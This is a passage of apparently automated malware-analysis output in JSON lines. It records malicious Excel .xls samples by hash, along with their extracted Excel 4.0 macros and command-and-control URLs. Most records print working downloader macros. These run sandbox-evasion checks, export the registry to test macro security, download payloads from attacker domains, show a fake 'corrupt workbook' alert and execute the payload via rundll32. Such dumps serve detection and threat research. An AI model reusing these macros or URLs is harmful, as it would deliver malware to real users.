/y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JEkZMXBNCf\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8e5369a3babe43106a6ed29510691c99a064b9457ad1c222e38adf0aaf839818"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8e5369a3babe43106a6ed29510691c99a064b9457ad1c222e38adf0aaf839818","filesize":167424,"md5":"2a229490c331a0b2a42dcedf2fd0116b","sha1":"dfb575c6c5b3df0a6426680f0e528990beabcd2e","sha256":"8e5369a3babe43106a6ed29510691c99a064b9457ad1c222e38adf0aaf839818","sha512":"70fd2663904f89275deb105deaf5feb7d6a554a491b3de08d6ecb5bb902529e2e501f51e98420e35fdf332d86a27205a856848bb41bd019356588cf950331652","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8e5369a3babe43106a6ed29510691c99a064b9457ad1c222e38adf0aaf839818.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"txBGRmgYLN\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8e560bb5f2ab13462d60ff8a8fabaaf6ae90d94d207d21320ec67f8f52b6568c"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8e560bb5f2ab13462d60ff8a8fabaaf6ae90d94d207d21320ec67f8f52b6568c","filesize":168960,"md5":"1c1ed4a29331b134879939ba798ea5ce","sha1":"397051775997cd45eb257535c78a3738ea8b10c0","sha256":"8e560bb5f2ab13462d60ff8a8fabaaf6ae90d94d207d21320ec67f8f52b6568c","sha512":"695c11f368d83b53add904af0b230a8026f411caf19ede8ef3aeaefc676a4eb4008c5e6fc1510441cfb074dc25f6c33afcfa7eab605750a8a0c0ebc2d6970aaf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8e560bb5f2ab13462d60ff8a8fabaaf6ae90d94d207d21320ec67f8f52b6568c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TeBFl9u8l5\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8e5ead49bcccbc75f378dfaa5718b4d04e0bb7d7dc916cd6757386a500b65588"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8e5ead49bcccbc75f378dfaa5718b4d04e0bb7d7dc916cd6757386a500b65588","filesize":185344,"md5":"57b25d6b44ab38ddbbf050debd26db09","sha1":"2847986ee62740740cb0a565d617a5c2c24dd913","sha256":"8e5ead49bcccbc75f378dfaa5718b4d04e0bb7d7dc916cd6757386a500b65588","sha512":"caabbac7cb2bbd720a7c19ffec717878de3a2ad6d144f8712233cc94f9036e746e052ddd31ff8cee87a0bbe7b295dc66b0c5e581daa887732d2e149a74839c89","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8e5ead49bcccbc75f378dfaa5718b4d04e0bb7d7dc916cd6757386a500b65588.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8e690daa55dc42883ef22b4c5b9f48e6c5634dfbd3519f41145b2fdb7c7018ee"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8e690daa55dc42883ef22b4c5b9f48e6c5634dfbd3519f41145b2fdb7c7018ee","filesize":209408,"md5":"b6306c90b40790c7d99ce8704a5caafe","sha1":"1880aed4890872a3069b7c5f5a4e4b61045b971d","sha256":"8e690daa55dc42883ef22b4c5b9f48e6c5634dfbd3519f41145b2fdb7c7018ee","sha512":"3f1b827a858d044aa6abb3b59d558f36e1b0d43d5ded8d940c9baa0ee9f12e8e92630af55a11727afb3460ef5a3478314bfc2e300244dc55b753eafb52f63274","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8e690daa55dc42883ef22b4c5b9f48e6c5634dfbd3519f41145b2fdb7c7018ee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"DIWtJPQ4k1\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8e6e49cfdb82bf1fdf27dd14b7522feec37b2556eede4baa19df41eafc69ef47"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8e6e49cfdb82bf1fdf27dd14b7522feec37b2556eede4baa19df41eafc69ef47","filesize":144384,"md5":"36ebdca08cdeedc832a06b9c164f043d","sha1":"42b9b91226f47af172bba7af40c26abdd67274e4","sha256":"8e6e49cfdb82bf1fdf27dd14b7522feec37b2556eede4baa19df41eafc69ef47","sha512":"c37720cc0e384b02304a0aa2e3e8d5be2caab4f26400e390776e59b852f803a53424c90079bd3d0930313648976d28a2a079bc54a1ab0301dfbae2c9d6e8a7f6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8e6e49cfdb82bf1fdf27dd14b7522feec37b2556eede4baa19df41eafc69ef47.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"32O95N63ou\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8e760fb7a720bffaf0d5a20ba432465111ca1ede54c070c0f36db2c780f2bb85"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8e760fb7a720bffaf0d5a20ba432465111ca1ede54c070c0f36db2c780f2bb85","filesize":144384,"md5":"9c3de35f9fa1e85b492f739fe0dc34f3","sha1":"9f7e3ca3ec3bbeef584e847fe180a8ea259590cd","sha256":"8e760fb7a720bffaf0d5a20ba432465111ca1ede54c070c0f36db2c780f2bb85","sha512":"33285e8055858d850e413a216b140fcf81232879a2bb59a3abe160ceb179aed8a003de4c4cb65f74f9054a71d85176c5550ab5cd2d300d2f9718ec3d23b191f5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8e760fb7a720bffaf0d5a20ba432465111ca1ede54c070c0f36db2c780f2bb85.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"sYsZfkE67T\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8e7e03afb0d3cfd3221330750ad6b2f05d4450373714fbfdad0681abf051610b"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8e7e03afb0d3cfd3221330750ad6b2f05d4450373714fbfdad0681abf051610b","filesize":209920,"md5":"c14a92ef61bafd23479e87ff67961c1e","sha1":"3338b1117932c51bd729ea4ed9865cac74f9cb29","sha256":"8e7e03afb0d3cfd3221330750ad6b2f05d4450373714fbfdad0681abf051610b","sha512":"e8681dbb3d89d37f2ca4b0ae9f726a8a382ecdcebb3f5d18e2674af8fc7c3df50a8db2a8234ba8c7c66bd45a6dab22bb0a4243d544791a150c4df7e7712f0ae0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8e7e03afb0d3cfd3221330750ad6b2f05d4450373714fbfdad0681abf051610b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3ZRGD9kJxb\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8e82f5fde8bcc7571e91e2ee29bf9f8c7aebc31bed5d9081998ba0d411971179"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8e82f5fde8bcc7571e91e2ee29bf9f8c7aebc31bed5d9081998ba0d411971179","filesize":209920,"md5":"14ee6d0c6f494575fb5f71a03c879939","sha1":"d685c57b8adfea7c4ac9126088b93dceaae2e69e","sha256":"8e82f5fde8bcc7571e91e2ee29bf9f8c7aebc31bed5d9081998ba0d411971179","sha512":"36a1cf7908b10e69e47baf5067bfaa30868e9542ee973cd73cc9d5d43dafa73ef699c1f52e67a582bc890d0ce964f1ddd1a9e3cf15a23c7e0de035f8729fe4b8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8e82f5fde8bcc7571e91e2ee29bf9f8c7aebc31bed5d9081998ba0d411971179.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Lwx5Oy0yvY\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8e9fbd96d80e3f1c4597bf0f153d4f93a4d4a4c7de3204bdf377eabe438fc017"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8e9fbd96d80e3f1c4597bf0f153d4f93a4d4a4c7de3204bdf377eabe438fc017","filesize":116224,"md5":"03797c144b2bd44fcfdb1f10bf1b9fe9","sha1":"c865722687d62db0fefadcc78bcbc5eb2cce310f","sha256":"8e9fbd96d80e3f1c4597bf0f153d4f93a4d4a4c7de3204bdf377eabe438fc017","sha512":"9b90dd60f4fc5d39bd3645a4d0bbc17dd7f4e055a12d94bed9ec88c25e4fbed4dff668cfd3c78af4aba7a2c2b81a67965a303e44b74d5de168acaad19df58ca4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8e9fbd96d80e3f1c4597bf0f153d4f93a4d4a4c7de3204bdf377eabe438fc017.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7SURyBM12t\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8eb150401d5a6e21c8e8df0f8933667d34361d7d5374b04103ad32d91b509c1c"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8eb150401d5a6e21c8e8df0f8933667d34361d7d5374b04103ad32d91b509c1c","filesize":209408,"md5":"46bd5b49627f3102ef4e130eeeeb60f3","sha1":"f3984ed0c4bbd5f1839c54dacac115c5a7299fea","sha256":"8eb150401d5a6e21c8e8df0f8933667d34361d7d5374b04103ad32d91b509c1c","sha512":"09d9c250b7f6c46e53bcdf6c3f60c687856b1b3c6d50b38edbc1ccea7ff38d638a814f9ff4219d9d9c5470fb74cfcb294834a26580cc08b65c24d1e5f26c9f47","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8eb150401d5a6e21c8e8df0f8933667d34361d7d5374b04103ad32d91b509c1c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ySqNEiyxd2\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8eb995a0758878aed9bb3aeb5db12986e7c9846ea4483a55abe3f05b3320df9d"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8eb995a0758878aed9bb3aeb5db12986e7c9846ea4483a55abe3f05b3320df9d","filesize":109568,"md5":"145b023d9b4a9ef92a03ec69e7e8b5e9","sha1":"d09120ad4394c3c29cd0904debe9858810dd542a","sha256":"8eb995a0758878aed9bb3aeb5db12986e7c9846ea4483a55abe3f05b3320df9d","sha512":"2334d47c75de1abed794f7c006ea74fd48f5718a9312a2cb8c4dff10606a86ef1b279d1d6032e2a81a7306fed4da472d0a3945cac52eda0e75eb40991da53a81","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8eb995a0758878aed9bb3aeb5db12986e7c9846ea4483a55abe3f05b3320df9d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"32h4RPn9qh\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8ec88fe39b08de10b5af3a690ef26d1f1e65e8105fbeab3878524e5a7aec4a20"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8ec88fe39b08de10b5af3a690ef26d1f1e65e8105fbeab3878524e5a7aec4a20","filesize":228864,"md5":"7920dbda810bba00508735b3c6a72854","sha1":"4800b99e88cf02d10176eabee694a43b6eb5becf","sha256":"8ec88fe39b08de10b5af3a690ef26d1f1e65e8105fbeab3878524e5a7aec4a20","sha512":"5c06a789838ce51ac22b0750c2e535571ca5b588a57bb5d71e5f8b0b48835c162d91e0b3b9216eb13f59d3b844997f805244b655c7ed3e4584353f5e2843f34c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8ec88fe39b08de10b5af3a690ef26d1f1e65e8105fbeab3878524e5a7aec4a20.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://studyshine.in/wp-cryn.php","https://arturkauf.pl/wp-cryn.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://studyshine.in/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://arturkauf.pl/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"iF99xDuQ9A\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8ec9e7f89d80231e56bd4d5a9cf2f7741c1527453511ceb264c6bfe594053bf3"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8ec9e7f89d80231e56bd4d5a9cf2f7741c1527453511ceb264c6bfe594053bf3","filesize":160768,"md5":"134c8f7d2c4e8f95c7feaae0b85d2ae8","sha1":"598b7a6845102a10303556916cc0e9e3ddc8b86f","sha256":"8ec9e7f89d80231e56bd4d5a9cf2f7741c1527453511ceb264c6bfe594053bf3","sha512":"33705a8a97ea2608cdc3ba0a75a8602580fd3542301c2500afabff206a89ff10d9b55d13601bf867121ceea8096f49c0a23107fe760ef08a311ad9034b1c70d4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8ec9e7f89d80231e56bd4d5a9cf2f7741c1527453511ceb264c6bfe594053bf3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2DSaEdWMVT\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8ecbcab915d7c41e9386f98e5b9b5eff4faba0ec154338737867a5037751e52c"},"analysis":{"reported":"2020-04-09T16:17:38Z","score":10},"files":[{"filename":"8ecbcab915d7c41e9386f98e5b9b5eff4faba0ec154338737867a5037751e52c","filesize":214016,"md5":"226d00e6e4ae4942f260f97e33065810","sha1":"b4534c4d81257309c2a71576da8c6fb096357c58","sha256":"8ecbcab915d7c41e9386f98e5b9b5eff4faba0ec154338737867a5037751e52c","sha512":"f32017fad7905431eadabb19899d58626b2e51eceaab31ebd439de6d3a7c4702af6888f06645fd742ad2f9831fb5214a435da4ee1572f990d3a0779acec5a67c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8ecbcab915d7c41e9386f98e5b9b5eff4faba0ec154338737867a5037751e52c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YKgrvehOBG\",TRUE)\nGOTO(R$0C$18)"}}}]}
